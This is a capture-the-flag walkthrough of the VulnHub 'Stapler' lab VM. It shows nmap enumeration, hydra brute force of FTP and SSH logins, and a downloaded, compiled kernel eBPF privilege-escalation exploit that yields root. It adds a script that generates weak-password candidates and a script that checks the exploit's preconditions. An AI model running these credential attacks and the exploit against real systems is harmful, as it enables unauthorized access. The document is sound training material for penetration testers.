Stapler is a boot2root with multiple paths to shell and root, written by g0tmi1k. I found the simple brute-force path the most obvious on the first play-through, but I think I will revisit this one to try the others.
Discovery & Enumeration
root@kali:~# mkcd VulnHub/Stapler
root@kali:~/VulnHub/Stapler# netdiscover -pr 10.1.11.0/24
Currently scanning: (passive) | Screen View: Unique Hosts
1 Captured ARP Req/Rep packets, from 4 hosts. Total size: 60
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.11.137 08:00:27:f2:ed:b4 1 60 Cadmus Computer Systems
root@kali:~/VulnHub/Stapler# echo 10.1.11.137 > ip
root@kali:~/VulnHub/Stapler# nmap -A -p- -T5 $(cat ip)
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-29 15:36 BST
Nmap scan report for red.initech.vulnlab.fbcnt.in (10.1.11.137)
Host is up (0.00022s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_ 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
| id.server: patriot.fbcnt.in
|_ bind.version: dnsmasq-2.75
80/tcp open http
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: RED)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 53
| Version: .7.12-0ubuntu1
| Thread ID: 27
| Capabilities flags: 63487
| Some Capabilities: LongPassword, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsTransactions, Support41Auth, FoundRows, Speaks41ProtocolOld, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, ODBCClient, SupportsCompression, IgnoreSigpipes, DontAllowDatabaseTableColumn, LongColumnFlag
| Status: Autocommit
Kv\x12\x19`"dx\s\x01ptM"
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
Host script results:
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED
| Domain name:
| FQDN: red
|_ System time: 2016-06-29T16:38:10+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms red.initech.vulnlab.fbcnt.in (10.1.11.137)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.26 seconds
Anonymous FTP, etc
There is a lot running on this box. Working top-to-bottom, anonymous FTP immediately caught my attention, so I started there.
root@kali:~/VulnHub/Stapler# lftp -e 'set ftp:passive-mode false' -u anonymous,anonymous $(cat ip)
lftp anonymous@10.1.11.137:~> ls
-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
lftp anonymous@10.1.11.137:/> cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
107 bytes transferred
lftp anonymous@10.1.11.137:/> exit
So we have a note for Elly left by John, heavily implying there is an FTP user named Elly.
root@kali:~/VulnHub/Stapler# echo elly > users
root@kali:~/VulnHub/Stapler# hydra -L users -P /usr/share/seclists/Passwords/rockyou-10.txt -e nsr ftp://$(cat ip)
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-29 15:48:02
[DATA] max 16 tasks per 1 server, overall 64 tasks, 95 login tries (l:1/p:95), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 10.1.11.137 login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-29 15:48:06
So Elly clearly isn't very security conscious: her password is her username reversed, which hydra's -e nsr option (null, same as login, reversed login) picks up without a wordlist at all. Let's take a look in her FTP account.
She Sells SSH Shells...
root@kali:~/VulnHub/Stapler# lftp -e 'set ftp:passive-mode false' -u elly,ylle $(cat ip)
lftp elly@10.1.11.137:~> ls
drwxr-xr-x 5 0 0 4096 Jun 03 13:51 X11
drwxr-xr-x 3 0 0 4096 Jun 03 13:51 acpi
-rw-r--r-- 1 0 0 3028 Apr 20 23:09 adduser.conf
-rw-r--r-- 1 0 0 51 Jun 03 19:20 aliases
-rw-r--r-- 1 0 0 12288 Jun 03 19:20 aliases.db
...
lrwxrwxrwx 1 0 0 23 Jun 03 13:49 vtrgb -> /etc/alternatives/vtrgb
-rw-r--r-- 1 0 0 4942 Jan 08 14:18 wgetrc
drwxr-xr-x 3 0 0 4096 Jun 03 13:51 xdg
drwxr-xr-x 2 0 0 4096 Jun 03 13:51 xml
drwxr-xr-x 2 0 0 4096 Jun 03 15:20 zsh
And her home directory is /etc! Assuming she can't read shadow, I'll grab passwd so I at least have a user list.
lftp elly@10.1.11.137:/> get shadow
get: Access failed: 550 Failed to open file. (shadow)
lftp elly@10.1.11.137:/> get passwd
2908 bytes transferred
Okay, so far so good. Let's see whether any of the users with shell access have equally terrible passwords.
root@kali:~/VulnHub/Stapler# cat passwd | grep -v /false | grep -v /nologin | grep -v :$ | cut -f1 -d: | sort > users
root@kali:~/VulnHub/Stapler# hydra -L users -e nsr -t 4 ssh://$(cat ip)
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-29 15:54:12
[DATA] max 4 tasks per 1 server, overall 64 tasks, 84 login tries (l:28/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 61.00 tries/min, 61 tries in 00:01h, 23 todo in 00:01h, 4 active
[22][ssh] host: 10.1.11.137 login: SHayslett password: SHayslett
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-29 15:55:39
Bingo! This is almost going too well, we're bound to hit a brick wall soon.
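The two steps above (filter the copied passwd down to accounts with a real shell, then try null / same-as-login / reversed-login for each) are worth having as a script, because the same pattern turns up on a lot of boxes. This is an added example, not part of the original write-up; the passwd lines it embeds are constructed, not the real file from the box. Note that the filter is the same one used above and therefore keeps oddities such as /bin/sync, which is fine for a quick brute force but worth knowing.

```shell
#!/bin/sh
# Added example: build a user list from a copied /etc/passwd and expand it into
# the "user:password" pairs that hydra's -e nsr option would try.

# write_sample_passwd FILE: constructed sample data for a stand-alone run
# (these are NOT the real accounts from the Stapler box).
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
elly:x:1000:1000::/home/elly:
peter:x:1001:1001::/home/peter:/bin/zsh
sam:x:1002:1002::/home/sam:/bin/false
EOF
}

# shell_users FILE: login names whose shell field is non-empty and is neither
# .../false nor .../nologin (the same filter as the grep chain above), sorted.
shell_users() {
    awk -F: '$7 != "" && $7 !~ /\/false$/ && $7 !~ /\/nologin$/ { print $1 }' "$1" | sort
}

# reverse_string STRING: print STRING reversed (portable, no dependency on rev).
reverse_string() {
    printf '%s' "$1" | awk '{ s = ""; for (i = length($0); i > 0; i--) s = s substr($0, i, 1); print s }'
}

# nsr_candidates FILE: for every shell user print three "user:password" lines:
# empty password (n), username as password (s) and reversed username (r).
nsr_candidates() {
    shell_users "$1" | while IFS= read -r u; do
        printf '%s:\n' "$u"
        printf '%s:%s\n' "$u" "$u"
        printf '%s:%s\n' "$u" "$(reverse_string "$u")"
    done
}

# Usage: sh nsr.sh /path/to/passwd > candidates.txt
# then:  hydra -C candidates.txt -t 4 ssh://TARGET   (-C takes login:pass pairs)
if [ -n "${1:-}" ]; then
    nsr_candidates "$1"
fi
```

Feeding the pairs to hydra with -C instead of -L/-e keeps the attempt count identical to the run above (three per user) while letting you add site-specific guesses to the same file.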
root@kali:~/VulnHub/Stapler# ssh SHayslett@$(cat ip)
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@10.1.11.137's password:
Welcome back!
SHayslett@red:~$ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
And I'm in! I seem to recall a Kernel 4.4 local root exploit a few months ago...
root@kali:~/VulnHub/Stapler# searchsploit Linux Kernel 4.4
------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------- ----------------------------------
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1) | ./linux/local/39277.c
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2) | ./linux/local/40003.c
Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploi | ./linux/local/39772.txt
------------------------------------------------------------------------------------------- ----------------------------------
root@kali:~/VulnHub/Stapler# getsploit 39772
'/usr/share/exploitdb/platforms/linux/local/39772.txt' -> './39772.txt'
root@kali:~/VulnHub/Stapler# cat 39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
...
E-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
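The advisory states two preconditions: a 4.4 or later kernel, and kernel.unprivileged_bpf_disabled not set to 1. Before running a kernel exploit on a target (or when auditing your own hosts) it is worth checking exactly those, since a failed kernel exploit can take the box down. The script below is an added example, not part of the original write-up or the 39772 archive; it only tests the stated preconditions and cannot tell you whether the distribution has backported the fix for the double-fdput bug itself.

```shell
#!/bin/sh
# Added example: pre-flight check for the two preconditions named in the
# 39772 advisory (kernel >= 4.4, unprivileged bpf() not disabled by sysctl).

# version_ge A B: succeed when dotted version A is >= B (uses GNU sort -V).
version_ge() {
    [ "$(printf '%s\n%s\n' "$2" "$1" | sort -V | head -n1)" = "$2" ]
}

# unpriv_bpf_reachable RELEASE SYSCTL_VALUE
#   RELEASE       kernel release string as printed by uname -r
#   SYSCTL_VALUE  contents of /proc/sys/kernel/unprivileged_bpf_disabled,
#                 or an empty string when that file does not exist
# Succeeds only when both advisory preconditions hold.
unpriv_bpf_reachable() {
    rel=${1%%-*}                      # "4.4.0-21-generic" -> "4.4.0"
    version_ge "$rel" "4.4" || return 1
    case "$2" in
        ""|0) return 0 ;;             # default (0) or no sysctl: bpf() open to unprivileged users
        *)    return 1 ;;             # 1 (or 2 on newer kernels) disables it
    esac
}

# check_this_host: run the check against the machine the script is executing on.
check_this_host() {
    v=""
    if [ -r /proc/sys/kernel/unprivileged_bpf_disabled ]; then
        v=$(cat /proc/sys/kernel/unprivileged_bpf_disabled)
    fi
    if unpriv_bpf_reachable "$(uname -r)" "$v"; then
        echo "unprivileged bpf() reachable on $(uname -r) (sysctl='$v')"
        echo "mitigation: sysctl -w kernel.unprivileged_bpf_disabled=1"
        return 0
    fi
    echo "advisory preconditions not met on $(uname -r) (sysctl='$v')"
    return 1
}

# Usage: sh bpfcheck.sh   (exit status 0 means the preconditions hold)
if [ "${1:-}" = "--run" ]; then
    check_this_host
fi
```

On the defensive side, setting kernel.unprivileged_bpf_disabled=1 (and persisting it in /etc/sysctl.d) removes the unprivileged entry point this whole exploit class depends on, independent of whether the specific bug is patched.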
That sounds perfect; let's grab it on the target machine and see how we fare...
SHayslett@red:~$ wget -q https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
SHayslett@red:~$ unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/crasher.tar
inflating: 39772/exploit.tar
SHayslett@red:~$ tar xvf 39772/exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
SHayslett@red:~$ (cd ebpf_mapfd_doubleput_exploit; ./compile.sh; ./doubleput)
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),1005(SHayslett)
There is only one thing left to do!
root@red:~/ebpf_mapfd_doubleput_exploit# cat /root/flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b